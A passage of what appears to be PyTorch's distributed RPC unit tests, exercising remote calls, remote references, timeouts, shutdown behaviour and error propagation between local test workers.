val, my_tensor_function(torch.ones(j, j), torch.ones(j, j))
)
j += 1
@dist_init
def test_py_tensors_in_container(self):
n = self.rank + 1
dst_rank = n % self.world_size
a = [torch.ones(n, n), torch.ones(n, n)]
b = TensorClass(build_complex_tensors())
c = {"foo": torch.ones(n, n), "bar": torch.ones(n, n)}
ret = rpc.rpc_sync(
worker_name(dst_rank), my_complex_tensor_function, args=(a, b, c)
)
self.assertEqual(ret, my_complex_tensor_function(a, b, c))
@dist_init
def test_py_nested_pickle(self):
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(
worker_name(dst_rank),
run_nested_pickle,
args=(MyPickleClass(), torch.ones(2, 2)),
)
m = MyPickleClass()
m.set(my_tensor_function(torch.ones(2, 2), torch.ones(2, 2)))
self.assertEqual(ret, run_nested_pickle(m, torch.ones(2, 2)))
@dist_init
def test_py_function_exception(self):
n = self.rank + 1
dst_rank = n % self.world_size
with self.assertRaises(TypeError):
ret = rpc.rpc_sync(worker_name(dst_rank), no_result, args=(10,))
@dist_init
def test_py_raise_in_user_func(self):
with captured_output() as (_, err):
# This barrier prevents a race condition where the main thread has
# not entered the context manager when the remote function runs.
initialize_pg(self.file_init_method, self.rank, self.world_size)
dist.barrier()
n = self.rank + 1
dst_rank = n % self.world_size
fut = rpc.rpc_async(worker_name(dst_rank), raise_func)
with self.assertRaisesRegex(ValueError, expected_err):
fut.wait()
# This barrier prevents a race condition where the main thread exits
# context manager before the remote function has ran.
dist.barrier()
# Validate that trainers log errors when running functions.
stderr_lines = err.getvalue()
self.assertTrue(expected_err in stderr_lines)
@dist_init
def test_py_raise_in_user_func_escaped_str(self):
n = self.rank + 1
dst_rank = n % self.world_size
fut = rpc.rpc_async(worker_name(dst_rank), raise_func_escape)
try:
fut.wait()
except ValueError as e:
msg = str(e)
# Ensure newlines are unescaped to provide a better repr of error.
self.assertEqual(msg, msg.encode("utf-8").decode("unicode_escape"))
else:
self.assertTrue(False, "expected raise_func_escape to raise ValueError.")
@dist_init
def test_nested_rpc(self):
self._nested_rpc(nested_rpc, torch.ones(2, 2) + 1)
@dist_init
def test_stress_light_rpc(self):
self._stress_test_rpc(light_rpc)
@dist_init
def test_stress_heavy_rpc(self):
self._stress_test_rpc(heavy_rpc, repeat=20, args=(torch.ones(100, 100),))
@dist_init
def test_stress_heavy_rpc_torchscript(self):
self._stress_test_rpc(heavy_rpc_torchscript, repeat=20, args=(torch.ones(100, 100),))
@dist_init
def test_builtin_remote_ret(self):
self._builtin_remote_ret(
torch.ones(2, 2),
torch.ones(2, 2),
torch.ones(2, 2) * 2
)
@dist_init
def test_builtin_remote_self(self):
self._builtin_remote_self(
torch.ones(2, 2),
torch.ones(2, 2),
torch.ones(2, 2) * 2
)
@staticmethod
def _multi_args_fn(n, sparse=False):
if sparse:
return (build_sparse_tensor(), build_sparse_tensor())
else:
return (torch.ones(n, n), torch.ones(n, n))
@dist_init
def test_multi_builtin_remote_ret(self):
self._test_multi_remote_call(
torch.add, False,
args_fn=RpcTest._multi_args_fn
)
@dist_init
def test_py_udf_remote(self):
n = self.rank + 1
dst_rank = n % self.world_size
rref = rpc.remote(
worker_name(dst_rank),
my_function,
kwargs={"a": n, "b": n + 1, "c": n + 2},
)
self.assertEqual(rref.to_here(), my_function(n, n + 1, n + 2))
@staticmethod
def _multi_kwargs_fn(n, sparse=False):
if sparse:
return {
"a": build_sparse_tensor(),
"b": build_sparse_tensor(),
"c": build_sparse_tensor()
}
else:
return {"a": torch.ones(n, n), "b": torch.ones(n, n), "c": torch.ones(n, n)}
@dist_init
def test_multi_py_udf_remote(self):
self._test_multi_remote_call(
my_function,
False,
kwargs_fn=RpcTest._multi_kwargs_fn
)
@dist_init
def test_py_rref_args(self):
self._py_rref_args(
torch.ones(2, 2),
1,
torch.ones(2, 2),
2,
torch.ones(2, 2) * 2 + 3)
@dist_init
def test_py_rref_args_user_share(self):
self._py_rref_args_user_share(
torch.ones(2, 2),
1,
2,
torch.ones(2, 2),
3,
4,
torch.ones(2, 2) * 2 + 10
)
@dist_init
def test_py_rpc_rref_args(self):
self._py_rpc_rref_args(
torch.ones(2, 2),
1,
2,
torch.ones(2, 2),
3,
4,
torch.ones(2, 2) * 2 + 10
)
@dist_init
def test_nested_remote(self):
self._nested_remote(
nested_remote,
torch.ones(2, 2) + 3
)
@dist_init
def test_nested_rref(self):
self._nested_rref(
nested_rref,
torch.ones(2, 2) + 1,
torch.ones(2, 2) + 2
)
@dist_init
def test_nested_rref_stress(self):
self._nested_rref_stress(
nested_rref,
torch.ones(2, 2) + 1,
torch.ones(2, 2) + 2
)
@dist_init
def test_multi_layer_nested_async_rpc(self):
# This test will exit right away, but there will be a chain of async
# RPCs. The termination algorithm should detect those messages properly.
# Otherwise, some peer could exit early, leaving others to timeout
# errors or connection closed errors.
ttl = 20
n = self.rank + 1
dst_rank = n % self.world_size
multi_layer_nested_async_rpc(dst_rank, self.world_size, ttl)
@dist_init
def test_remote_with_exception(self):
n = self.rank + 1
dst_rank = n % self.world_size
# check ref to other workers
rref = rpc.remote(worker_name(dst_rank), raise_func)
with self.assertRaises(ValueError):
rref.to_here()
# check ref to itself
rref = rpc.remote(worker_name(self.rank), no_result, args=(10,))
with self.assertRaises(TypeError):
rref.to_here()
@dist_init
def test_rpc_return_rref(self):
n = self.rank + 1
dst_rank1 = n % self.world_size
dst_rank2 = (n + 1) % self.world_size
rref = rpc.rpc_sync(
worker_name(dst_rank1),
rpc_return_rref,
args=(worker_name(dst_rank2),),
)
self.assertEqual(rref.to_here(), torch.ones(2, 2) + 1)
@dist_init
def test_rref_forward_chain(self):
ttl = 8
n = self.rank + 1
dst_rank = n % self.world_size
rref = rpc.remote(
worker_name(dst_rank), torch.add, args=(torch.ones(n, n), 1)
)
ret_rref = rref_forward_chain(dst_rank, self.world_size, rref, ttl)
for i in range(ttl):
self.assertEqual(len(ret_rref), 1)
ret_rref = ret_rref[0].to_here()
ret = ret_rref
self.assertEqual(ret, torch.add(torch.ones(n, n), 1))
@dist_init
def test_local_rref_no_fork(self):
local_rref = RRef(35)
self.assertEqual(local_rref.local_value(), 35)
@dist_init
def test_local_value_not_on_owner(self):
# ensure that an error message is thrown if a user tries to call
# local_value() on a non-owning node.
next_rank = (self.rank + 1) % self.world_size
rref = rpc.remote(
worker_name(next_rank), torch.add, args=(torch.ones(1), torch.ones(1))
)
with self.assertRaisesRegex(
RuntimeError, (
fr"For UserRRef\(rref_id=GloballyUniqueId\(created_on={self.rank}, local_id=0\), "
fr"fork_id=GloballyUniqueId\(created_on={self.rank}, local_id=1\)\), "
r"can't call localValue\(\) on user "
fr"WorkerInfo\(id={self.rank}, name={worker_name(self.rank)}\). "
fr"Call it on owner WorkerInfo\(id={next_rank}, name={worker_name(next_rank)}\)"
)
):
rref.local_value()
@dist_init
def test_return_local_rrefs(self):
n = self.rank + 1
dst_rank = n % self.world_size
rref_list = rpc.rpc_sync(
worker_name(dst_rank), get_rref_list, args=([1, 2, 3],)
)
for rref in rref_list:
rpc.rpc_sync(
rref.owner(),
_call_method_on_rref,
args=(MyClass.increment_value, rref, 10),
)
rets = [
rpc.rpc_sync(
rref.owner(), _call_method_on_rref, args=(MyClass.get_value, rref)
)
for rref in rref_list
]
self.assertEqual(rets, [11, 12, 13])
@dist_init
def _test_rref_type(self, blocking):
def launched_rpc(events):
expected_name = f"rpc_{RPCExecMode.ASYNC.value}#_rref_typeof_on_owner"
return any([e.name.startswith(expected_name) for e in events])
dst = worker_name((self.rank + 1) % self.world_size)
rref = rpc.remote(dst, torch.add, args=(torch.ones(2), 1))
with _profile() as p:
t = rref._get_type(blocking=blocking)
if not blocking:
t = t.wait()
self.assertTrue(launched_rpc(p.function_events))
expected_type = type(torch.ones(2))
self.assertEqual(t, expected_type)
futs = []
def verify(fut):
self.assertEqual(fut.value(), expected_type)
with _profile() as p:
for _ in range(10):
t = rref._get_type(blocking=blocking)
if not blocking:
futs.append(t)
t.add_done_callback(verify)
t = t.wait()
self.assertEqual(t, expected_type)
if not blocking:
# Note that cached calls with blocking=False all return the same
# cached original future.
first_fut = futs[0]
for f in futs[1:]:
self.assertTrue(f is first_fut)
# Ensure we never launch another RPC, other than for the very
# first call.
self.assertFalse(launched_rpc(p.function_events))
self.assertEqual(t, type(torch.ones(2)))
rref = rpc.remote(dst, MyClass, args=(0,))
rref_type = rref._get_type(blocking=blocking)
if not blocking:
rref_type = rref_type.wait()
self.assertEqual(rref_type, MyClass)
def test_rref_type_blocking(self):
self._test_rref_type(blocking=True)
def test_rref_type_non_blocking(self):
self._test_rref_type(blocking=False)
@dist_init
def _test_rref_type_with_error(self, blocking):
dst = worker_name((self.rank + 1) % self.world_size)
# 10 ms timeout
rref = rpc.remote(dst, raise_func)
# Blocking: error raised inline
if blocking:
with self.assertRaisesRegex(ValueError, "Expected error"):
rref._get_type(blocking=blocking)
else:
# Non-blocking: Immediately return future, block on wait
fut = rref._get_type(blocking=blocking)
with self.assertRaisesRegex(ValueError, "Expected error"):
fut.wait()
def test_rref_type_with_error_blocking(self):
self._test_rref_type_with_error(blocking=True)
def test_rref_type_with_error_non_blocking(self):
self._test_rref_type_with_error(blocking=False)
@dist_init
def _test_rref_type_owner(self, blocking):
rref = RRef(torch.ones(2) + 1)
rref_type = rref._get_type(blocking=blocking)
if not blocking:
rref_type = rref_type.wait()
self.assertEqual(rref_type, type(torch.ones(2)))
rref = RRef(MyClass(0))
rref_type = rref._get_type(blocking=blocking)
if not blocking:
rref_type = rref_type.wait()
self.assertEqual(rref_type, MyClass)
def test_rref_type_owner_blocking(self):
self._test_rref_type_owner(blocking=True)
def test_rref_type_owner_non_blocking(self):
self._test_rref_type_owner(blocking=False)
@staticmethod
def _slow_add(x, y):
time.sleep(1)
return x + y
@dist_init
def test_rref_type_slow_init(self):
dst = worker_name((self.rank + 1) % self.world_size)
rref = rpc.remote(dst, RpcTest._slow_add, args=(torch.ones(2), 1))
self.assertEqual(rref._get_type(), type(torch.ones(2)))
@dist_init
def test_owner_equality(self):
a = RRef(40)
b = RRef(50)
other_rank = (self.rank + 1) % self.world_size
other_a = rpc.remote(
worker_name(other_rank), torch.add, args=(torch.ones(1), 1)
)
other_b = rpc.remote(
worker_name(other_rank), torch.add, args=(torch.ones(1), 1)
)
other_a.to_here() # to ensure clean termination
other_b.to_here()
self.assertNotEqual(a.owner(), 23)
self.assertEqual(other_a.owner(), other_b.owner())
self.assertNotEqual(a.owner(), other_a.owner())
self.assertEqual(other_a.owner(), other_a.owner())
self.assertEqual(other_a.owner(), other_b.owner())
self.assertEqual(a.owner(), a.owner())
self.assertEqual(a.owner(), b.owner())
self.assertEqual(a.owner(), rpc.get_worker_info())
x = dict()
x[a.owner()] = a
x[other_a.owner()] = other_a
self.assertEqual(x[a.owner()], a)
self.assertEqual(x[b.owner()], a)
self.assertEqual(x[other_a.owner()], other_a)
self.assertEqual(x[other_b.owner()], other_a)
self.assertEqual(len(x), 2)
@dist_init
def test_pass_local_rrefs(self):
n = self.rank + 1
dst_rank = n % self.world_size
dst_worker = worker_name(dst_rank)
rref = RRef(40)
self.assertEqual(
rpc.rpc_sync(dst_worker, add_rref_to_value, args=(rref, 50)), 90
)
self.assertEqual(
rpc.rpc_async(dst_worker, add_rref_to_value, args=(rref, 50)).wait(), 90
)
self.assertEqual(
rpc.remote(dst_worker, add_rref_to_value, args=(rref, 50)).to_here(), 90
)
@dist_init
def test_remote_same_worker(self):
n = self.rank + 1
dst_rank = n % self.world_size
rref_a = rpc.remote(
worker_name(dst_rank), torch.add, args=(torch.ones(n, n), 2)
)
rref_b = rpc.remote(
worker_name(dst_rank), torch.add, args=(torch.ones(n, n), 1)
)
rref_c = rpc.remote(
worker_name(dst_rank), my_rref_function, args=(rref_a, rref_b)
)
self.assertEqual(rref_c.to_here(), torch.ones(n, n) + 4)
@dist_init(setup_rpc=True)
def test_call_method_on_rref(self):
"""
Tests that it is possible to call an instance method on a remote objet
by using rref.owner() as destination of the call.
"""
vals = [10, 2, 5, 7]
dst_rank = (self.rank + 1) % self.world_size
dst_worker = worker_name(dst_rank)
# creates a remote object
rref = rpc.remote(dst_worker, MyClass, args=(vals[0],))
# modifies state of the remote object
rpc.rpc_sync(
rref.owner(),
_call_method_on_rref,
args=(MyClass.increment_value, rref, vals[1]),
)
rpc.rpc_async(
rref.owner(),
_call_method_on_rref,
args=(MyClass.increment_value, rref, vals[2]),
).wait()
rpc.remote(
rref.owner(),
_call_method_on_rref,
args=(MyClass.increment_value, rref, vals[3]),
).to_here()
# queries state of the remote object
result = rpc.rpc_sync(
dst_worker, _call_method_on_rref, args=(MyClass.get_value, rref)
)
self.assertEqual(result, sum(vals))
# Notice `rpc.api.shutdown()` accesses
# `_delete_all_user_and_unforked_owner_rrefs` through
# `torch.distributed.rpc.api`, so patching
# `torch.distributed.rpc._delete_all_user_and_unforked_owner_rrefs` will
# not help.
@mock.patch.object(torch.distributed.rpc.api, "_delete_all_user_and_unforked_owner_rrefs")
def _test_rref_leak(self, _mock_delete_all_user_and_unforked_owner_rrefs, ignore_leak):
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
initialize_pg(self.file_init_method, self.rank, self.world_size)
# Wait for all init to complete.
dist.barrier()
rref = rpc.remote(
worker_name((self.rank + 1) % self.world_size),
torch.add,
args=(torch.ones(2, 2), 1),
)
import torch.distributed.rpc.api as api
if ignore_leak:
api._ignore_rref_leak = True
rpc.shutdown(graceful=True)
else:
api._ignore_rref_leak = False
with self.assertRaisesRegex(RuntimeError, "Leaking RRef"):
rpc.shutdown(graceful=True)
@dist_init(setup_rpc=False)
def test_rref_leak(self):
self._test_rref_leak(ignore_leak=False)
@dist_init(setup_rpc=False)
def test_ignore_rref_leak(self):
self._test_rref_leak(ignore_leak=True)
@dist_init
def test_rref_str(self):
rref1 = RRef(self.rank)
id_class = "GloballyUniqueId"
self.assertEqual(
"OwnerRRef({}(created_on={}, local_id=0))".format(id_class, self.rank), rref1.__str__()
)
dst_rank = (self.rank + 1) % self.world_size
rref2 = rpc.remote(
worker_name(dst_rank), torch.add, args=(torch.ones(2, 2), 1)
)
self.assertEqual(
rref2.__str__(),
"UserRRef(RRefId = {0}(created_on={1}, local_id=1), ForkId = {0}(created_on={1}, local_id=2))".format(
id_class, self.rank
),
)
@dist_init
def test_rref_get_future(self):
# Tests that we can obtain the future corresponding to the creation of
# the RRef on remote end
if self.rank == 0:
# Builtin
rref = rpc.remote(worker_name(1), torch.add, args=(1, 1))
rref.to_here()
fut = rref._get_future()
self.assertIsInstance(fut, torch._C.Future)
# UDF
rref = rpc.remote(worker_name(1), foo_add, args=())
rref.to_here()
fut = rref._get_future()
self.assertIsInstance(fut, torch._C.Future)
# Script
rref = rpc.remote(worker_name(1), my_script_func, args=(torch.tensor(1), ))
rref.to_here()
fut = rref._get_future()
self.assertIsInstance(fut, torch._C.Future)
@dist_init
def test_rref_context_debug_info(self):
# This test checks local states that are modified by remote workers.
# This means that we would need barrier before and after every check.
# The barrier before the check makes sure that all previous states are
# cleared globally, the barrier after ensures that no following states
# change gets into the current check.
initialize_pg(self.file_init_method, self.rank, self.world_size)
# Check 1: local RRef does not update owners_ map or add a pending user.
#################################################
rref1 = RRef(self.rank)
# don't need a barrier here as local RRef is handled by this thread
info = _rref_context_get_debug_info()
self.assertIn("num_owner_rrefs", info)
self.assertIn("num_pending_users", info)
# RRef on local value is not added to context until shared across RPC
self.assertEqual(0, int(info["num_owner_rrefs"]))
self.assertEqual(0, int(info["num_pending_users"]))
# barrier after the check 1
dist.barrier()
# Check 2: Sharing RRef as an arg should update owners_ map
###########################################################
dst_rank = (self.rank + 1) % self.world_size
rpc.rpc_sync(worker_name(dst_rank), set_global_rref, args=(rref1,))
# barrier before check 2
wait_until_pending_futures_and_users_flushed()
dist.barrier()
info = _rref_context_get_debug_info()
self.assertIn("num_owner_rrefs", info)
self.assertEqual(1, int(info["num_owner_rrefs"]))
# no pending users since the fork is finished
self.assertEqual(0, int(info["num_pending_users"]))
# barrier after check 2
dist.barrier()
# clear states for check 2
rpc.rpc_sync(worker_name(dst_rank), clear_global_rref)
# Wait for owner rref to be cleared.
while int(info["num_owner_rrefs"]) != 0:
info = _rref_context_get_debug_info()
time.sleep(0.1)
dist.barrier()
# Check 3: rpc.remote call should update owners_ map
####################################################
rref2 = rpc.remote(
worker_name(dst_rank), torch.add, args=(torch.ones(2, 2), 1)
)
rref3 = rpc.remote(
worker_name(dst_rank), torch.add, args=(torch.ones(2, 2), 1)
)
rref2.to_here()
rref3.to_here()
# barrier before check 3
wait_until_pending_futures_and_users_flushed()
dist.barrier()
info = _rref_context_get_debug_info()
self.assertIn("num_owner_rrefs", info)
self.assertEqual(2, int(info["num_owner_rrefs"]))
# no pending users since the fork is finished
self.assertEqual(0, int(info["num_pending_users"]))
# barrier after check 3
dist.barrier()
@dist_init
def test_disable_gil_profiling(self):
# test that rpc.enable_gil_profiling(false) will result in
# GIL wait time not being recorded.
# GIL profiling should be disabled by default.
dst_rank = (self.rank + 1) % self.world_size
rpc.rpc_sync(
worker_name(dst_rank), torch.add, args=(torch.ones(1), torch.ones(1))
)
info = rpc.api._get_current_rpc_agent().get_debug_info()
self.assertRaises(KeyError, lambda: info["agent.gil_average_wait_time_us"])
rpc.enable_gil_profiling(True)
rpc.rpc_sync(
worker_name(dst_rank), torch.add, args=(torch.ones(1), torch.ones(1))
)
info = rpc.api._get_current_rpc_agent().get_debug_info()
self.assertIn("agent.gil_average_wait_time_us", info)
@dist_init(setup_rpc=False)
def test_local_shutdown(self):
# test that we can start RPC and then immediately locally shutdown
# without sending any messages.
rpc.init_rpc(
name="worker%d" % self.rank,
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
# pass in graceful=False to ensure that we don't wait for other workers.
rpc.shutdown(graceful=False)
@dist_init
def test_debug_info(self):
# only test keys in this test case. Values should be covered by
# individual module debug info tests
import torch.distributed.autograd as dist_autograd
info = _get_debug_info()
rref_info = _rref_context_get_debug_info()
agent_info = rpc.api._get_current_rpc_agent().get_debug_info()
autograd_info = dist_autograd._get_debug_info()
common_keys = rref_info.keys() & agent_info.keys() & autograd_info.keys()
self.assertEqual(0, len(common_keys))
expected = {}
expected.update(rref_info)
expected.update(agent_info)
expected.update(autograd_info)
# NB: Key ordering is only preserved in python 3.6+. So here, we
# manually check keys are equal.
for key in expected.keys():
self.assertIn(key, info.keys())
for key in info.keys():
self.assertIn(key, expected.keys())
@dist_init(setup_rpc=False)
@sandcastle_skip_if(
IS_MACOS,
"Test is flaky on MacOS since libuv error handling is not as robust as TCP",
)
def test_handle_send_exceptions(self):
# test that if a callee node has gone down, we raise an appropriate
# exception instead of just crashing.
rpc.init_rpc(
name="worker%d" % self.rank,
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
rpc._set_rpc_timeout(10)
# This barrier is needed to ensure that some workers do not exit before
# others have been brought up.
initialize_pg(self.file_init_method, self.rank, self.world_size)
dist.barrier()
if self.rank == 1:
dst_rank = (self.rank + 1) % self.world_size
dst_worker = worker_name(dst_rank)
# allow destination worker to exit without joining
error_str = self.get_shutdown_error_regex()
wait_until_node_failure(dst_rank, error_str)
fut = rpc.rpc_async(dst_worker, torch.add, args=(torch.ones(1), 3))
# Shutdown sequence is not very well defined and as a result
# we can see any of the error messages defined in get_shutdown_error_regex.
with self.assertRaisesRegex(RuntimeError, error_str):
fut.wait()
# exit all workers non-gracefully.
rpc.shutdown(graceful=False)
@dist_init
def test_deadlock(self):
# this test is copied from https://github.com/pytorch/pytorch/issues/45089
if self.rank == 1:
dst1 = worker_name((self.rank + 1) % self.world_size)
x = torch.ones(2)
y = torch.ones(2)
rpc.rpc_async(dst1, RpcTest._slow_add, args=(x, y), timeout=15).wait()
dist_initialized = dist.is_initialized()
if not dist_initialized:
dist.init_process_group(
backend="gloo",
init_method=self.file_init_method,
rank=self.rank,
world_size=self.world_size,
)
@dist_init(setup_rpc=False)
def test_local_shutdown_with_rpc(self):
# test that we can start RPC, send RPCs, and then run local shutdown.
rpc.init_rpc(
name="worker%d" % self.rank,
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
n = self.rank + 1
dst_rank = n % self.world_size
rpc.rpc_sync(
worker_name(dst_rank),
torch.add,
args=(torch.ones(n, n), torch.ones(n, n)),
)
# A barrier is needed to ensure that all RPCs are processed.
# Otherwise, some RPCs can timeout since the receiving end
# has terminated.
initialize_pg(self.file_init_method, self.rank, self.world_size)
dist.barrier()
# pass in graceful=False to ensure that we don't wait for other workers.
rpc.shutdown(graceful=False)
@dist_init(setup_rpc=False)
def test_set_and_get_default_rpc_timeout(self):
timeout = 0.5
# A new `RpcBackendOptions` is constructed
# when accessing `self.rpc_backend_options`.
rpc_backend_options = self.rpc_backend_options
rpc_backend_options.rpc_timeout = timeout
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=rpc_backend_options,
)
set_timeout = rpc.get_rpc_timeout()
self.assertEqual(timeout, set_timeout)
rpc.shutdown()
@dist_init
def test_default_timeout_used(self):
"""
Tests that if no timeout is passed into rpc_async and rpc_sync, then the
default timeout is used.
"""
dst_rank = (self.rank + 1) % self.world_size
rpc._set_rpc_timeout(0.001) # 1 ms
# futures should time out and be marked with an exception indicating it as such.
futs = [
rpc.rpc_async(worker_name(dst_rank), my_sleep_func, args=())
for _ in range(10)
]
expected_error = self.get_timeout_error_regex()
for fut in futs:
with self.assertRaisesRegex(RuntimeError, expected_error):
fut.wait()
# ensure that if a new timeout is set old futures don't time out but new ones do.
rpc._set_rpc_timeout(200) # 200 seconds
# create a longstanding RPC.
fut1 = rpc.rpc_async(worker_name(dst_rank), my_sleep_func, args=(1,))
# now, set a short timeout.
rpc._set_rpc_timeout(0.001)
# fut2 should time out, fut1 should not.
fut2 = rpc.rpc_async(worker_name(dst_rank), my_sleep_func, args=(1,))
with self.assertRaisesRegex(RuntimeError, expected_error):
fut2.wait()
fut1.wait()
# Zero timeout means infinity, so future should run to completion.
rpc._set_rpc_timeout(0)
rpc.rpc_async(worker_name(dst_rank), my_sleep_func, args=()).wait()
# reset to default timeout so shutdown messages can process cleanly.
rpc._set_rpc_timeout(rpc.constants.DEFAULT_RPC_TIMEOUT_SEC)
@dist_init
def test_rpc_timeouts(self):
# TODO: enable timeouts for rpc.remote/RRef (https://github.com/pytorch/pytorch/issues/33803)
dst_rank = (self.rank + 1) % self.world_size
dst_worker = worker_name(dst_rank)
timeout = 0.1 # 100 ms
expected_error = self.get_timeout_error_regex()
# Test async UDF
fut = rpc.rpc_async(dst_worker, my_sleep_func, args=(1,), timeout=timeout)
with self.assertRaisesRegex(RuntimeError, expected_error):
fut.wait()
# Ensure run to completion if there is no timeout and we use the default
# RPC timeout.
rpc.rpc_async(dst_worker, my_sleep_func, args=(1,)).wait()
# Test sync UDF
with self.assertRaisesRegex(RuntimeError, expected_error):
rpc.rpc_sync(dst_worker, my_sleep_func, args=(1,), timeout=timeout)
# Ensure run to completion if there is no timeout and we use the default
# RPC timeout.
rpc.rpc_sync(dst_worker, my_sleep_func, args=(1,))
# If we set a default timeout for RPCs, it should be respected, though
# still overridden if we pass in a different timeout to the APIs.
rpc._set_rpc_timeout(0.001)
fut = rpc.rpc_async(dst_worker, my_sleep_func, args=(1,))
with self.assertRaisesRegex(RuntimeError, expected_error):
fut.wait()
with self.assertRaisesRegex(RuntimeError, expected_error):
rpc.rpc_sync(dst_worker, my_sleep_func, args=(1,))
# The RPCs should run to completion since we override the timeout.
rpc.rpc_async(dst_worker, my_sleep_func, args=(1,), timeout=5).wait()
rpc.rpc_sync(dst_worker, my_sleep_func, args=(1,), timeout=5)
# Passing in a zero timeout should ensure that the RPC won't time out.
rpc.rpc_async(dst_worker, my_sleep_func, args=(1,), timeout=0).wait()
rpc.rpc_sync(dst_worker, my_sleep_func, args=(1,), timeout=0)
# Reset for clean shutdown
rpc._set_rpc_timeout(rpc.constants.DEFAULT_RPC_TIMEOUT_SEC)
def test_dist_init_decorator(self):
@dist_init(setup_rpc=False)
def test_func(self):
return "expected result"
self.assertEqual(test_func(self), "expected result")
@dist_init
def test_func(self):
return "expected result"
self.assertEqual(test_func(self), "expected result")
def test_use_rpc_pickler(self):
class TestPickler:
pass
test_pickler = TestPickler()
with _use_rpc_pickler(test_pickler):
self.assertTrue(torch.distributed.rpc.api._default_pickler is test_pickler)
self.assertTrue(
torch.distributed.rpc.api._default_pickler is _internal_rpc_pickler
)
@dist_init
def test_wait_all(self):
with _wait_all():
self.assertTrue(_thread_local_var.future_list == [])
dst = worker_name((self.rank + 1) % self.world_size)
fut = rpc.rpc_async(dst, torch.add, (torch.ones(2, 2), 1))
self.assertTrue(len(_thread_local_var.future_list) == 1)
self.assertTrue(isinstance(_thread_local_var.future_list[0], torch._C.Future))
self.assertTrue(fut.done())
self.assertEqual(fut.wait(), torch.ones(2, 2) + 1)
self.assertFalse(hasattr(_thread_local_var, "future_list"))
@dist_init
def test_wait_all_multiple_call(self):
with _wait_all():
self.assertTrue(_thread_local_var.future_list == [])
dst = worker_name((self.rank + 1) % self.world_size)
for i in range(20):
fut = rpc.rpc_async(dst, torch.add, (torch.ones(i, i), 1))
res = rpc.rpc_sync(dst, torch.add, (torch.ones(i, i), 1))
self.assertEqual(res, torch.ones(i, i) + 1)
self.assertEqual(fut.wait(), torch.ones(i, i) + 1)
self.assertTrue(len(_thread_local_var.future_list) == 20)
self.assertFalse(hasattr(_thread_local_var, "future_list"))
@dist_init
def test_wait_all_timeout(self):
expected_error = self.get_timeout_error_regex()
with self.assertRaisesRegex(RuntimeError, expected_error):
with _wait_all():
self.assertTrue(_thread_local_var.future_list == [])
dst = worker_name((self.rank + 1) % self.world_size)
timeout = 0.1 # 100 ms
fut = rpc.rpc_async(dst, my_sleep_func, args=(1,), timeout=timeout)
self.assertFalse(hasattr(_thread_local_var, "future_list"))
@dist_init
def test_wait_all_raise_in_user_func(self):
with self.assertRaises(ValueError):
with _wait_all():
self.assertTrue(_thread_local_var.future_list == [])
dst = worker_name((self.rank + 1) % self.world_size)
fut = rpc.rpc_async(dst, raise_func)
self.assertFalse(hasattr(_thread_local_var, "future_list"))
@dist_init
def test_wait_all_raise_in_body(self):
with self.assertRaises(ValueError):
with _wait_all():
raise_func()
self.assertFalse(hasattr(_thread_local_var, "future_list"))
timed_out_rpc_event = None
@staticmethod
def timed_out_rpc():
RpcTest.timed_out_rpc_event.wait()
@dist_init
def test_wait_all_exit_early_python(self):
# Initialize the event in the subprocess.
RpcTest.timed_out_rpc_event = Event()
# Wait for all processes to initialize event.
initialize_pg(self.file_init_method, self.rank, self.world_size)
dist.barrier()
dst = worker_name((self.rank + 1) % self.world_size)
fut1 = rpc.rpc_async(dst, RpcTest.timed_out_rpc)
fut2 = rpc.rpc_async(dst, raise_func)
fut3 = rpc.rpc_async(dst, raise_func)
# We should receive the error from fut2
with self.assertRaisesRegex(ValueError, expected_err):
torch.futures.wait_all([fut1, fut2, fut3])
# Unblock RPC thread for fut1
RpcTest.timed_out_rpc_event.set()
@dist_init
def test_wait_all_exit_early_builtin(self):
# Initialize the event in the subprocess.
RpcTest.timed_out_rpc_event = Event()
# Wait for all processes to initialize event.
initialize_pg(self.file_init_method, self.rank, self.world_size)
dist.barrier()
dst = worker_name((self.rank + 1) % self.world_size)
fut1 = rpc.rpc_async(dst, RpcTest.timed_out_rpc)
fut2 = rpc.rpc_async(dst, torch.add, args=(torch.rand(10), torch.rand(5)))
fut3 = rpc.rpc_async(dst, torch.add, args=(torch.rand(10), torch.rand(5)))
# We should receive the error from fut2
with self.assertRaisesRegex(RuntimeError, "size of tensor"):
torch.futures.wait_all([fut1, fut2, fut3])
# Unblock RPC thread for fut1
RpcTest.timed_out_rpc_event.set()
@dist_init
def test_wait_all_exit_early_script_function(self):
# Initialize the event in the subprocess.
RpcTest.timed_out_rpc_event = Event()
# Wait for all processes to initialize event.
initialize_pg(self.file_init_method, self.rank, self.world_size)
dist.barrier()
dst = worker_name((self.rank + 1) % self.world_size)
fut1 = rpc.rpc_async(dst, RpcTest.timed_out_rpc)
fut2 = rpc.rpc_async(dst, raise_func_script, args=(expected_err,))
fut3 = rpc.rpc_async(dst, raise_func_script, args=(expected_err,))
# We should receive the error from fut2
with self.assertRaisesRegex(RuntimeError, expected_err):
torch.futures.wait_all([fut1, fut2, fut3])
# Unblock RPC thread for fut1
RpcTest.timed_out_rpc_event.set()
@dist_init
def test_function_not_on_callee(self):
# test that if a function does not exist on a callee, we don't crash,
# instead we get an AttributeError indicating that the func does not exist.
this_module = sys.modules[__name__]
caller_worker = "worker0"
callee_worker = "worker1"
if self.rank == 1:
# Use delattr to remove the binding of a func on this nodes
delattr(this_module, "foo_add")
# notify remote end that we have removed it.
rpc.rpc_sync(caller_worker, set_value, args=(self.rank,))
if self.rank == 0:
# func exists on caller, but not callee.
# wait for remote end to remove the binding of foo_add func.
wait_for_value_future()
# Ensure that we have the attribute on this module. Otherwise, the test could fail due to a caller-side pickling error.
self.assertTrue(hasattr(this_module, "foo_add"))
with self.assertRaisesRegex(
RuntimeError, "RPC pickler does not serialize"
):
rpc.rpc_sync(callee_worker, foo_add, args=())
@dist_init
def test_non_garbage_collected_user_rref_due_to_local_circular_dependency(self):
dst_worker_name = worker_name((self.rank + 1) % self.world_size)
a = MyClass(1)
b = MyClass(2)
# This is to make Python not garbage collect a and b.
a.other = b
